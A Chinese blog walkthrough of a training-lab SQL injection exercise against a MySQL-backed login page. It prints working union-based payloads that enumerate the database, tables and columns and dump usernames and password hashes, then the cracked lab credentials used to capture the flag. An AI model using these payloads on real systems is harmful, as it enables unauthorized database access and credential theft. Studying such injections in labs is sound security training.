mysql 手工sql注入_SQL注入——Union注入攻击——手工注入篇——SQL手工注入漏洞测试(MySQL数据库)...

0x01

开启靶场我们可以看到登录界面

048bc77765938c5cd7a99f5a378f56af.png

0x02

我们来寻找一下注入点

7cb83f32bf784de5b30355a44cab9cfa.png

利用工具啊D我们可以找到注入点

0x03

76b7d380f1a4e0055e5309147551c4ac.png

可以看到是这样的界面

下面我们来进行检测

我直接给出语句就不一步一步截图了

检测语句:

and 1=1 返回正常

and 1=2 返回错误

order by 4 得到有四个字段数

0x04

利用联合查询来查询回显位置

id=-1%20union%20select%201,2,3,4

判断得到

eafd99ce82e5dd9c1e74b5613df57124.png

可以知道回显在 2 3这两个字段

接下来,构造拼接语句进行查询

使用回显位爆出数据库名和版本

id=-1%20union%20select%201,database(),version(),4

6edb0028f95c2a020817533595002215.png

根据数据库名爆破表名

id=-1%20union%20select%201,group_concat(table_name),3,4%20from%20information_schema.tables%20where%20table_schema%20=%20%22mozhe_Discuz_StormGroup%22#

bff578bb2276dee67d8aacc19005e088.png

根据表名爆破列名

id=-1%20union%20select%201,group_concat(column_name),3,4%20from%20information_schema.columns%20where%20table_name%20=%20%22StormGroup_member%22%20#

3eaa061c709a8c53279b851c8fe5bd81.png

爆列内容

id=-1%20union%20select%201,group_concat(name),group_concat(password),4%20from%20StormGroup_member%20#

68843ad0a08289b36416d13c0c8dd7a4.png

0x05

这边可以看到存在两个账户

密码是md5解密一下就可以得到两个账号,其中一个登录就可以

账号一:

mozhe

dsan13

账号二:

mozhe

451866

登录就可以拿到flag了

1f93854dd5caca2b9df63cf373757528.png

ok,今天就到这里,关注我,一起学习哦

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值